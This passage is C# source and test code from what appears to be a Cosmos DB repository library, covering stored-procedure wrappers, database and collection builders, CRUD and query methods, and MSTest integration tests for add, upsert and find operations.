        await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2, param3, param4, param5, param6, param7, param8, param9, param10, param11);
}

internal class StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TResult>
    : StoreProcedureImpl
    , IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TResult>
{
    public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
        : base(client, repository, id) { }

    public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9, TParam10 param10, TParam11 param11, TParam12 param12) =>
        await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2, param3, param4, param5, param6, param7, param8, param9, param10, param11, param12);
}

internal class StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TResult>
    : StoreProcedureImpl
    , IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TResult>
{
    public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
        : base(client, repository, id) { }

    public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9, TParam10 param10, TParam11 param11, TParam12 param12, TParam13 param13) =>
        await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2, param3, param4, param5, param6, param7, param8, param9, param10, param11, param12, param13);
}

internal class StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TResult>
    : StoreProcedureImpl
    , IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TResult>
{
    public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
        : base(client, repository, id) { }

    public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9, TParam10 param10, TParam11 param11, TParam12 param12, TParam13 param13, TParam14 param14) =>
        await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2, param3, param4, param5, param6, param7, param8, param9, param10, param11, param12, param13, param14);
}

internal class StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TResult>
    : StoreProcedureImpl
    , IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TResult>
{
    public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
        : base(client, repository, id) { }

    public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9, TParam10 param10, TParam11 param11, TParam12 param12, TParam13 param13, TParam14 param14, TParam15 param15) =>
        await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2, param3, param4, param5, param6, param7, param8, param9, param10, param11, param12, param13, param14, param15);
}

internal class StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TParam16, TResult>
    : StoreProcedureImpl
    , IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TParam16, TResult>
{
    public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
        : base(client, repository, id) { }

    public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9, TParam10 param10, TParam11 param11, TParam12 param12, TParam13 param13, TParam14 param14, TParam15 param15, TParam16 param16) =>
        await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2, param3, param4, param5, param6, param7, param8, param9, param10, param11, param12, param13, param14, param15, param16);
}
}<file_sep>using Newtonsoft.Json;
using System;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.Linq;
namespace CosmosDbRepository.Sample
{
/// <summary>
/// Sample document type. <see cref="FullName"/> is serialized as the Cosmos DB
/// document id, so two people sharing first+last name would collide.
/// </summary>
class Person
{
    // Document id: derived, read-only combination of first and last name.
    [JsonProperty(PropertyName = "id")]
    public string FullName => $"{FirstName} {LastName}";

    [JsonProperty(PropertyName = "first")]
    public string FirstName { get; set; }

    [JsonProperty(PropertyName = "last")]
    public string LastName { get; set; }

    [JsonProperty(PropertyName = "birthday")]
    public DateTime Birthday { get; set; }

    [JsonProperty(PropertyName = "phoneNumbers")]
    public Collection<PhoneNumber> PhoneNumbers { get; set; }

    [JsonProperty(PropertyName = "allThings")]
    public Dictionary<string, string> AllThings { get; set; }

    // NOTE(review): Cosmos DB documents _ts as seconds since epoch; confirm that
    // EpochUnits.Milliseconds is really what EpochConverter should be given here.
    [JsonConverter(typeof(EpochConverter), EpochUnits.Milliseconds)]
    [JsonProperty(PropertyName = "_ts")]
    public DateTime Modified { get; set; }

    [JsonProperty(PropertyName = "_etag")]
    public string ETag { get; set; }

    public override string ToString()
    {
        // BUGFIX: guard against an uninitialized collection (was a
        // NullReferenceException) and drop the redundant string.Format(...)
        // wrapped around an already-interpolated string.
        var phones = PhoneNumbers != null && PhoneNumbers.Any()
            ? string.Join(", ", PhoneNumbers.Select(p => p.ToString()))
            : "-";
        return $"{FirstName} {LastName}, Birthday {Birthday:MM-dd-yyyy} Phone numbers: {phones}";
    }
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Net;
using System.Threading.Tasks;
using Microsoft.Azure.Documents;
using Microsoft.Azure.Documents.Client;
namespace CosmosDbRepository.Implementation
{
/// <summary>
/// Default ICosmosDb implementation: lazily creates the database on first use and
/// materializes one repository per configured collection builder.
/// </summary>
internal class CosmosDb
: ICosmosDb
{
private readonly IDocumentClient _client;
// Lazy so that construction performs no I/O; first await creates the database.
private readonly AsyncLazy<Database> _database;
private readonly string _id;
// Fallback RU/s handed to every repository builder.
private readonly int? _defaultThroughput;
private readonly List<ICosmosDbRepository> _repositories;
Task<string> ICosmosDb.SelfLinkAsync => SelfLinkAsync();
public CosmosDb(IDocumentClient client, string databaseId, int? defaultThroughput, IEnumerable<ICosmosDbRepositoryBuilder> repositories)
{
if (string.IsNullOrWhiteSpace(databaseId))
{
throw new ArgumentException("Invalid name", nameof(databaseId));
}
_client = client ?? throw new ArgumentNullException(nameof(client));
_id = databaseId;
_defaultThroughput = defaultThroughput;
_database = new AsyncLazy<Database>(() => GetOrCreateDatabaseAsync());
_repositories = repositories.Select(cb => cb.Build(_client, this, _defaultThroughput)).ToList();
}
// Forces lazy database creation (if needed) and returns its self-link.
public async Task<string> SelfLinkAsync() => (await _database).SelfLink;
// Enumerable.First: throws InvalidOperationException when no repository matches.
public ICosmosDbRepository<T> Repository<T>(string name)
{
return (ICosmosDbRepository<T>)_repositories.First(r => r.Id == name);
}
// Resolves by document type; also First(), so a missing registration throws.
public ICosmosDbRepository<T> Repository<T>()
{
return (ICosmosDbRepository<T>)_repositories.First(r => r.Type == typeof(T));
}
// True when the service answers 204 NoContent.
public async Task<bool> DeleteAsync(RequestOptions options = null)
{
var response = await _client.DeleteDatabaseAsync(await SelfLinkAsync(), options);
return response.StatusCode == HttpStatusCode.NoContent;
}
// Eagerly creates the database and every collection (otherwise created on demand).
public async Task Init()
{
await _database;
foreach (var repo in _repositories)
{
await repo.Init();
}
}
// NOTE(review): query-then-create is racy — a concurrent creator would make
// CreateDatabaseAsync throw a 409 Conflict. Consider catching it and re-querying.
private async Task<Database> GetOrCreateDatabaseAsync()
{
var database = _client.CreateDatabaseQuery().Where(db => db.Id == _id).AsEnumerable().FirstOrDefault();
return database != null
? database
: await _client.CreateDatabaseAsync(new Database { Id = _id });
}
}
}<file_sep>using Microsoft.Azure.Documents.Client;
namespace CosmosDbRepository.Sample
{
/// <summary>Endpoint, key and connection policy needed to construct a DocumentClient.</summary>
public class DocumentClientSettings
{
// Account endpoint, e.g. https://{account}.documents.azure.com:443/
public string EndpointUrl { get; set; }
// Account master/read-write key.
public string AuthorizationKey { get; set; }
public ConnectionPolicy ConnectionPolicy { get; set; }
}
}<file_sep>namespace CosmosDbRepositoryTest
{
/// <summary>Test-environment switches for database/collection naming and cleanup.</summary>
public class EnvironmentConfig
{
public bool DeleteDatabaseOnClose { get; set; }
public bool RandomizeDbName { get; set; }
public bool RandomizeCollectionName { get; set; }
public bool DeleteCollectionsOnClose { get; set; }
}
}<file_sep>using FluentAssertions;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using System;
using System.Linq;
using System.Threading.Tasks;
namespace CosmosDbRepositoryTest.StringId
{
/// <summary>
/// Integration tests for FindFirstOrDefaultAsync against a live repository.
/// Each test isolates itself with a Guid payload rather than a clean collection.
/// </summary>
[TestClass]
public class CosmosDbRepositoryFindFirstTests
: CosmosDbRepositoryStringTests
{
// A stored document is found by predicate and round-trips unchanged.
[TestMethod]
public async Task FindFirst_Expect_Success()
{
using (var context = CreateContext())
{
var uniqueData = Guid.NewGuid().ToString();
var data = new TestData<string>
{
Id = GetNewId(),
Data = uniqueData
};
data = await context.Repo.AddAsync(data);
var foundData = await context.Repo.FindFirstOrDefaultAsync(d => d.Data == uniqueData);
foundData.Should().NotBeNull();
foundData.Should().BeEquivalentTo(data);
}
}
// No match returns null rather than throwing.
[TestMethod]
public async Task FindFirst_Expect_Success_WithNoData()
{
using (var context = CreateContext())
{
var uniqueData = Guid.NewGuid().ToString();
var foundData = await context.Repo.FindFirstOrDefaultAsync(d => d.Data == uniqueData);
foundData.Should().BeNull();
}
}
// The optional ordering clause decides which of several matches is "first".
[TestMethod]
public async Task FindFirst_MultipleRecords_Expect_Success()
{
using (var context = CreateContext())
{
var uniqueData = Guid.NewGuid().ToString();
var data = new TestData<string>
{
Id = GetNewId(),
Data = uniqueData,
Rank = 1
};
data = await context.Repo.AddAsync(data);
var data2 = new TestData<string>
{
Id = GetNewId(),
Data = uniqueData,
Rank = 2
};
data2 = await context.Repo.AddAsync(data2);
var foundData = await context.Repo.FindFirstOrDefaultAsync(d => d.Data == uniqueData, q => q.OrderByDescending(d => d.Rank));
foundData.Should().NotBeNull();
foundData.Should().BeEquivalentTo(data2);
foundData = await context.Repo.FindFirstOrDefaultAsync(d => d.Data == uniqueData, q => q.OrderBy(d => d.Rank));
foundData.Should().NotBeNull();
foundData.Should().BeEquivalentTo(data);
}
}
}
}
<file_sep>using Newtonsoft.Json;
using System;
namespace CosmosDbRepositoryTest
{
/// <summary>
/// Extended test document with a child/grandchild hierarchy, used to exercise
/// queries over nested arrays.
/// </summary>
public class ComplexTestData<T> : TestData<T>
{
    [JsonProperty("tag")]
    public string Tag { get; set; }
    [JsonProperty("xRefId")]
    public string XRefId { get; set; }
    [JsonProperty("date")]
    public DateTimeOffset Date { get; set; }
    // Nested array; joined against in the SelectMany/JOIN tests.
    [JsonProperty("childItems")]
    public ChildTestData[] ChildItems { get; set; }
}
/// <summary>Second-level test document element; filtered on <see cref="BooleanValue"/>.</summary>
public class ChildTestData
{
    [JsonProperty("booleanValue")]
    public bool BooleanValue { get; set; }
    [JsonProperty("grandchildItems")]
    public GrandchildTestData[] GrandchildItems { get; set; }
}
/// <summary>Leaf-level test document element projected by the join tests.</summary>
public class GrandchildTestData
{
    [JsonProperty("dataType")]
    public string DataType { get; set; }
    [JsonProperty("dataCategory")]
    public string DataCategory { get; set; }
    [JsonProperty("createdAt")]
    public DateTime CreatedAt { get; set; }
    [JsonProperty("numericValue")]
    public float NumericValue { get; set; }
}
}
<file_sep>using Microsoft.Azure.Documents;
using System;
namespace CosmosDbRepository
{
/// <summary>
/// Fluent builder describing a Cosmos DB database and its collections.
/// </summary>
public interface ICosmosDbBuilder
{
    /// <summary>Sets the database id; the implementation allows it to be set only once.</summary>
    ICosmosDbBuilder WithId(string name);
    /// <summary>Sets the throughput used by collections that do not specify their own.</summary>
    ICosmosDbBuilder WithDefaultThroughput(int? defaultThroughput);
    /// <summary>
    /// Registers a collection for <typeparamref name="T"/>. A null <paramref name="id"/>
    /// falls back to the type's CosmosDbRepositoryName attribute or its type name;
    /// <paramref name="func"/> may further configure the collection builder.
    /// </summary>
    ICosmosDbBuilder AddCollection<T>(string id = null, Action<ICosmosDbRepositoryBuilder> func = null);
    /// <summary>Materializes the database definition against the given client.</summary>
    ICosmosDb Build(IDocumentClient client);
}
}
<file_sep>using CosmosDbRepository.Implementation;
using Microsoft.Azure.Documents;
using System;
using System.Collections.Generic;
using System.Linq;
namespace CosmosDbRepository
{
/// <summary>
/// Default <see cref="ICosmosDbBuilder"/> implementation: collects collection
/// builders and produces a <see cref="CosmosDb"/> instance.
/// </summary>
public class CosmosDbBuilder
    : ICosmosDbBuilder
{
    private readonly List<ICosmosDbRepositoryBuilder> _collectionBuilders = new List<ICosmosDbRepositoryBuilder>();
    private int? _defaultThroughput;

    /// <summary>Database id; assignable exactly once via <see cref="WithId"/>.</summary>
    public string Id { get; private set; }

    public ICosmosDbBuilder WithId(string Id)
    {
        if (this.Id != null)
        {
            throw new InvalidOperationException("Id already set");
        }

        // Reject blank ids; a throw expression keeps assignment and validation together.
        this.Id = string.IsNullOrWhiteSpace(Id)
            ? throw new ArgumentException("Invalid database id", nameof(Id))
            : Id;

        return this;
    }

    public ICosmosDbBuilder WithDefaultThroughput(int? defaultThroughput)
    {
        _defaultThroughput = defaultThroughput;
        return this;
    }

    public ICosmosDbBuilder AddCollection<T>(string id = null, Action<ICosmosDbRepositoryBuilder> func = null)
    {
        id = GetCollectionName<T>(id);

        if (string.IsNullOrWhiteSpace(id))
        {
            throw new ArgumentException("Invalid collection id", nameof(id));
        }

        var builder = new CosmosDbRepositoryBuilder<T>().WithId(id);
        _collectionBuilders.Add(builder);

        // Give the caller a chance to customize the collection (indexes, throughput, ...).
        func?.Invoke(builder);
        return this;
    }

    public ICosmosDb Build(IDocumentClient client)
    {
        if (string.IsNullOrWhiteSpace(Id))
        {
            throw new InvalidOperationException("Id not specified");
        }

        return new CosmosDb(client, Id, _defaultThroughput, _collectionBuilders);
    }

    // Explicit name wins; otherwise the type's naming attribute, then the type name.
    private string GetCollectionName<T>(string name)
    {
        return name
            ?? typeof(T).GetCustomAttributes(false).OfType<CosmosDbRepositoryNameAttribute>().SingleOrDefault()?.Name
            ?? typeof(T).Name;
    }
}
}
<file_sep>using System;
using System.Collections.Concurrent;
using System.Linq;
using System.Linq.Expressions;
using System.Reflection;
namespace CosmosDbRepository.Implementation
{
internal static class ObjectExtensions
{
    // Cache of compiled per-type copy delegates: building the expression tree is
    // expensive, running the compiled lambda is cheap.
    private static readonly ConcurrentDictionary<Type, Func<object, object>> _copiers = new ConcurrentDictionary<Type, Func<object, object>>();

    /// <summary>
    /// Creates a shallow copy of <paramref name="source"/> by assigning every
    /// readable+writable public property and every settable public field onto a
    /// new instance of the same runtime type.
    /// </summary>
    public static T ShallowCopy<T>(this T source)
        where T : new()
    {
        // Builds the equivalent of: o => new Type { Member = ((Type)o).Member, ... }
        Func<object, object> Factory(Type type)
        {
            // Copyable members: read/write properties plus fields that are neither
            // readonly (IsInitOnly) nor const (IsLiteral).
            var properties = type.GetProperties().Where(i => i.CanRead && i.CanWrite).Cast<MemberInfo>()
                .Concat(type.GetFields().Where(i => !i.IsInitOnly && !i.IsLiteral));
            var o = Expression.Parameter(typeof(object), "o");
            var src = Expression.Variable(type, "src");
            var body = Expression.Block(new[] { src },
                Expression.Assign(src, Expression.Convert(o, type)),
                Expression.MemberInit(Expression.New(type), properties.Select(i => Expression.Bind(i, Expression.PropertyOrField(src, i.Name)))));
            return Expression.Lambda<Func<object, object>>(body, o).Compile();
        }

        // Key on the runtime type (not T) so derived instances are copied fully.
        return (T)_copiers.GetOrAdd(source.GetType(), Factory)(source);
    }
}
}
<file_sep>using CosmosDbRepository.Types;
using FluentAssertions;
using Microsoft.Azure.Documents;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using System;
using System.Linq;
using System.Net;
using System.Threading.Tasks;
namespace CosmosDbRepositoryTest.DocId
{
[TestClass]
public class CosmosDbRepositoryAddTests
    : CosmosDbRepositoryTests<TestData<DocumentId>>
{
    // Builds the standard test document for a given id flavor.
    private static TestData<DocumentId> NewItem(DocumentId id)
    {
        return new TestData<DocumentId>
        {
            Id = id,
            Data = "My Data"
        };
    }

    // Asserts that a second Add of the same id faults with HTTP 409 Conflict.
    private static async Task ExpectConflictAsync(Task<TestData<DocumentId>> conflictingAdd)
    {
        await conflictingAdd.ShollowException();
        conflictingAdd.IsFaulted.Should().BeTrue();
        conflictingAdd.Exception.InnerExceptions.Should().HaveCount(1);
        var dce = conflictingAdd.Exception.InnerExceptions.Single() as DocumentClientException;
        dce.StatusCode.Should().Be(HttpStatusCode.Conflict);
    }

    [TestMethod]
    public async Task Add_Expect_Success_AsInt()
    {
        using (var context = CreateContext())
        {
            await context.Repo.AddAsync(NewItem((int)DateTime.Now.Ticks));
        }
    }

    [TestMethod]
    public async Task Add_Expect_Conflict_AsInt()
    {
        using (var context = CreateContext())
        {
            var item = NewItem((int)DateTime.Now.Ticks);
            await context.Repo.AddAsync(item);
            await ExpectConflictAsync(context.Repo.AddAsync(item));
        }
    }

    [TestMethod]
    public async Task Add_Expect_Success_AsGuid()
    {
        using (var context = CreateContext())
        {
            await context.Repo.AddAsync(NewItem(Guid.NewGuid()));
        }
    }

    [TestMethod]
    public async Task Add_Expect_Conflict_AsGuid()
    {
        using (var context = CreateContext())
        {
            var item = NewItem(Guid.NewGuid());
            await context.Repo.AddAsync(item);
            await ExpectConflictAsync(context.Repo.AddAsync(item));
        }
    }

    [TestMethod]
    public async Task Add_Expect_Success_AsString()
    {
        using (var context = CreateContext())
        {
            await context.Repo.AddAsync(NewItem($"MyId{DateTime.Now.Ticks}"));
        }
    }

    [TestMethod]
    public async Task Add_Expect_Conflict_AsString()
    {
        using (var context = CreateContext())
        {
            var item = NewItem($"MyId{DateTime.Now.Ticks}");
            await context.Repo.AddAsync(item);
            await ExpectConflictAsync(context.Repo.AddAsync(item));
        }
    }
}
}
<file_sep>using FluentAssertions;
using Microsoft.Azure.Documents;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using System;
using System.Linq;
using System.Net;
using System.Threading.Tasks;
namespace CosmosDbRepositoryTest.StringId
{
[TestClass]
public class CosmosDbRepositoryUpsertTests
    : CosmosDbRepositoryStringTests
{
    // Upsert of a previously unseen id behaves as an insert.
    [TestMethod]
    public async Task Upsert_New_Expect_Success()
    {
        using (var context = CreateContext())
        {
            var entity = new TestData<string>
            {
                Id = GetNewId(),
                Data = "My Data"
            };

            await context.Repo.UpsertAsync(entity);
        }
    }

    // Upserting the stored copy (carrying the current etag) behaves as a replace.
    [TestMethod]
    public async Task Upsert_Added_Expect_Success()
    {
        using (var context = CreateContext())
        {
            var entity = await context.Repo.AddAsync(new TestData<string>
            {
                Id = GetNewId(),
                Data = "My Data"
            });

            await context.Repo.UpsertAsync(entity);
        }
    }

    // A second upsert with a stale etag must fail with HTTP 412.
    [TestMethod]
    public async Task Upsert_Expect_PreconditionFailed()
    {
        using (var context = CreateContext())
        {
            var entity = await context.Repo.AddAsync(new TestData<string>
            {
                Id = GetNewId(),
                Data = "My Data"
            });

            // First upsert bumps the etag server-side; 'entity' keeps the old one.
            await context.Repo.UpsertAsync(entity);

            var staleUpsert = context.Repo.UpsertAsync(entity);
            await staleUpsert.ShollowException();

            staleUpsert.IsFaulted.Should().BeTrue();
            staleUpsert.Exception.InnerExceptions.Should().HaveCount(1);
            var dce = staleUpsert.Exception.InnerExceptions.Single() as DocumentClientException;
            dce.StatusCode.Should().Be(HttpStatusCode.PreconditionFailed);
        }
    }
}
}
<file_sep>using CosmosDbRepository.Types;
using Microsoft.Azure.Documents;
using Microsoft.Azure.Documents.Client;
using Microsoft.Azure.Documents.Linq;
using Newtonsoft.Json;
using System;
using System.Collections.Concurrent;
using System.Collections.Generic;
using System.Linq;
using System.Linq.Expressions;
using System.Net;
using System.Reflection;
using System.Threading.Tasks;
namespace CosmosDbRepository.Implementation
{
/// <summary>
/// Document-collection repository over an <see cref="IDocumentClient"/>.
/// Lazily creates its backing collection (and stored procedures) on first use
/// and exposes CRUD, query, and stored-procedure access for <typeparamref name="T"/>.
/// </summary>
internal class CosmosDbRepository<T>
    : ICosmosDbRepository<T>
{
    private readonly IDocumentClient _client;
    private readonly ICosmosDb _documentDb;
    private readonly IndexingPolicy _indexingPolicy;
    private readonly FeedOptions _defaultFeedOptions;
    private readonly int? _throughput;
    private readonly List<StoredProcedure> _storedProcedures;
    // Not readonly: reset after DeleteAsync so the collection is recreated on next use.
    private AsyncLazy<DocumentCollection> _collection;
    // Per-runtime-type compiled accessors extracting (id, etag) from an entity.
    private static readonly ConcurrentDictionary<Type, Func<object, (string id, string eTag)>> _idETagHelper = new ConcurrentDictionary<Type, Func<object, (string id, string eTag)>>();

    public string Id { get; }
    public Type Type => typeof(T);
    public Task<string> AltLink => GetAltLink();

    public CosmosDbRepository(IDocumentClient client,
                              ICosmosDb documentDb,
                              string id,
                              IndexingPolicy indexingPolicy,
                              int? throughput,
                              IEnumerable<StoredProcedure> storedProcedures)
    {
        _documentDb = documentDb;
        _client = client;
        Id = id;
        _indexingPolicy = indexingPolicy;
        _throughput = throughput;
        _storedProcedures = new List<StoredProcedure>(storedProcedures);
        _defaultFeedOptions = new FeedOptions
        {
            EnableScanInQuery = true,
            EnableCrossPartitionQuery = true
        };
        _collection = new AsyncLazy<DocumentCollection>(() => GetOrCreateCollectionAsync());
    }

    /// <summary>Creates the document; faults with Conflict if the id already exists.</summary>
    public async Task<T> AddAsync(T entity, RequestOptions requestOptions = null)
    {
        var addedDoc = await _client.CreateDocumentAsync((await _collection).SelfLink, entity, requestOptions);
        return JsonConvert.DeserializeObject<T>(addedDoc.Resource.ToString());
    }

    /// <summary>
    /// Replaces the document, using the entity's etag (when present) as an
    /// If-Match condition for optimistic concurrency.
    /// </summary>
    public async Task<T> ReplaceAsync(T entity, RequestOptions requestOptions = null)
    {
        (string id, string eTag) = GetIdAndETag(entity);
        requestOptions = ApplyAccessCondition(requestOptions, AccessConditionType.IfMatch, eTag);

        // NOTE(review): Uri.EscapeUriString is deprecated and does not escape
        // characters such as '/'; Uri.EscapeDataString would be stricter for a
        // path segment. Kept for compatibility with existing document links — confirm before changing.
        var documentLink = $"{(await _collection).AltLink}/docs/{Uri.EscapeUriString(id)}";
        var response = await _client.ReplaceDocumentAsync(documentLink, entity, requestOptions);

        return (response.StatusCode == HttpStatusCode.NotModified)
            ? entity
            : JsonConvert.DeserializeObject<T>(response.Resource.ToString());
    }

    /// <summary>
    /// Inserts or replaces the document; the entity's etag (when present) is
    /// applied as an If-Match condition.
    /// </summary>
    public async Task<T> UpsertAsync(T entity, RequestOptions requestOptions = null)
    {
        (string id, string eTag) = GetIdAndETag(entity);
        requestOptions = ApplyAccessCondition(requestOptions, AccessConditionType.IfMatch, eTag);

        var response = await _client.UpsertDocumentAsync((await _collection).SelfLink, entity, requestOptions);
        return JsonConvert.DeserializeObject<T>(response.Resource.ToString());
    }

    /// <summary>Returns all documents matching the optional predicate and query clauses.</summary>
    public async Task<IList<T>> FindAsync(Expression<Func<T, bool>> predicate = null, Func<IQueryable<T>, IQueryable<T>> clauses = null, FeedOptions feedOptions = null)
    {
        var query =
            _client.CreateDocumentQuery<T>((await _collection).SelfLink, feedOptions ?? _defaultFeedOptions)
                .ConditionalWhere(predicate)
                .ConditionalApplyClauses(clauses)
                .AsDocumentQuery();

        var results = new List<T>();

        while (query.HasMoreResults)
        {
            var response = await query.ExecuteNextAsync<T>().ConfigureAwait(true);
            results.AddRange(response);
        }

        return results;
    }

    /// <summary>Paged variant of <see cref="FindAsync(Expression{Func{T, bool}}, Func{IQueryable{T}, IQueryable{T}}, FeedOptions)"/>; pageSize 0 means "no limit".</summary>
    public async Task<CosmosDbRepositoryPagedResults<T>> FindAsync(int pageSize, string continuationToken, Expression<Func<T, bool>> predicate = null, Func<IQueryable<T>, IQueryable<T>> clauses = null, FeedOptions feedOptions = null)
    {
        // Copy before mutating so the caller's FeedOptions instance is untouched.
        feedOptions = (feedOptions ?? _defaultFeedOptions).ShallowCopy();
        feedOptions.RequestContinuation = continuationToken;
        feedOptions.MaxItemCount = pageSize == 0 ? 10000 : pageSize;

        var query =
            _client.CreateDocumentQuery<T>((await _collection).SelfLink, feedOptions)
                .ConditionalWhere(predicate)
                .ConditionalApplyClauses(clauses)
                .AsDocumentQuery();

        var result = new CosmosDbRepositoryPagedResults<T>();

        while (query.HasMoreResults)
        {
            var response = await query.ExecuteNextAsync<T>().ConfigureAwait(true);
            result.Items.AddRange(response);

            if (pageSize > 0 && result.Items.Count >= pageSize)
            {
                result.ContinuationToken = response.ResponseContinuation;
                break;
            }
        }

        return result;
    }

    /// <summary>Projects every document through <paramref name="selector"/>.</summary>
    public async Task<IList<U>> SelectAsync<U>(Expression<Func<T, U>> selector, Func<IQueryable<U>, IQueryable<U>> selectClauses = null, FeedOptions feedOptions = null)
    {
        var query =
            _client.CreateDocumentQuery<T>((await _collection).SelfLink, feedOptions ?? _defaultFeedOptions)
                .Select(selector)
                .ConditionalApplyClauses(selectClauses)
                .AsDocumentQuery();

        var results = new List<U>();

        while (query.HasMoreResults)
        {
            var response = await query.ExecuteNextAsync<U>().ConfigureAwait(true);
            results.AddRange(response);
        }

        return results;
    }

    /// <summary>Paged projection; pageSize 0 means "no limit".</summary>
    public async Task<CosmosDbRepositoryPagedResults<U>> SelectAsync<U>(int pageSize, string continuationToken, Expression<Func<T, U>> selector, Func<IQueryable<U>, IQueryable<U>> selectClauses = null, FeedOptions feedOptions = null)
    {
        feedOptions = (feedOptions ?? _defaultFeedOptions).ShallowCopy();
        feedOptions.RequestContinuation = continuationToken;
        feedOptions.MaxItemCount = pageSize == 0 ? 10000 : pageSize;

        var query =
            _client.CreateDocumentQuery<T>((await _collection).SelfLink, feedOptions)
                .Select(selector)
                .ConditionalApplyClauses(selectClauses)
                .AsDocumentQuery();

        var result = new CosmosDbRepositoryPagedResults<U>();

        while (query.HasMoreResults)
        {
            var response = await query.ExecuteNextAsync<U>().ConfigureAwait(true);
            result.Items.AddRange(response);

            if (pageSize > 0 && result.Items.Count >= pageSize)
            {
                result.ContinuationToken = response.ResponseContinuation;
                break;
            }
        }

        return result;
    }

    /// <summary>Projection with a preceding where/transform stage of type <typeparamref name="V"/>.</summary>
    public async Task<IList<U>> SelectAsync<U, V>(Expression<Func<V, U>> selector, Func<IQueryable<T>, IQueryable<V>> whereClauses, Func<IQueryable<U>, IQueryable<U>> selectClauses = null, FeedOptions feedOptions = null)
    {
        var query =
            _client.CreateDocumentQuery<T>((await _collection).SelfLink, feedOptions ?? _defaultFeedOptions)
                .ApplyClauses(whereClauses)
                .Select(selector)
                .ConditionalApplyClauses(selectClauses)
                .AsDocumentQuery();

        var results = new List<U>();

        while (query.HasMoreResults)
        {
            var response = await query.ExecuteNextAsync<U>().ConfigureAwait(true);
            results.AddRange(response);
        }

        return results;
    }

    /// <summary>Paged projection with a preceding where/transform stage; pageSize 0 means "no limit".</summary>
    public async Task<CosmosDbRepositoryPagedResults<U>> SelectAsync<U, V>(int pageSize, string continuationToken, Expression<Func<V, U>> selector, Func<IQueryable<T>, IQueryable<V>> whereClauses, Func<IQueryable<U>, IQueryable<U>> selectClauses = null, FeedOptions feedOptions = null)
    {
        feedOptions = (feedOptions ?? _defaultFeedOptions).ShallowCopy();
        feedOptions.RequestContinuation = continuationToken;
        feedOptions.MaxItemCount = pageSize == 0 ? 10000 : pageSize;

        var query =
            _client.CreateDocumentQuery<T>((await _collection).SelfLink, feedOptions)
                .ApplyClauses(whereClauses)
                .Select(selector)
                .ConditionalApplyClauses(selectClauses)
                .AsDocumentQuery();

        var result = new CosmosDbRepositoryPagedResults<U>();

        while (query.HasMoreResults)
        {
            var response = await query.ExecuteNextAsync<U>().ConfigureAwait(true);
            result.Items.AddRange(response);

            if (pageSize > 0 && result.Items.Count >= pageSize)
            {
                result.ContinuationToken = response.ResponseContinuation;
                break;
            }
        }

        return result;
    }

    /// <summary>Flattens a nested collection selected from each document.</summary>
    public async Task<IList<TResult>> SelectManyAsync<TResult>(Expression<Func<T, IEnumerable<TResult>>> selector, Func<IQueryable<T>, IQueryable<T>> whereClauses = null, Func<IQueryable<TResult>, IQueryable<TResult>> selectClauses = null, FeedOptions feedOptions = null)
    {
        // No copy needed here: unlike the paged overloads, this method does not
        // mutate the feed options (consistent with the other non-paged queries).
        var query =
            _client.CreateDocumentQuery<T>((await _collection).SelfLink, feedOptions ?? _defaultFeedOptions)
                .ConditionalApplyClauses(whereClauses)
                .SelectMany(selector)
                .ConditionalApplyClauses(selectClauses)
                .AsDocumentQuery();

        var results = new List<TResult>();

        while (query.HasMoreResults)
        {
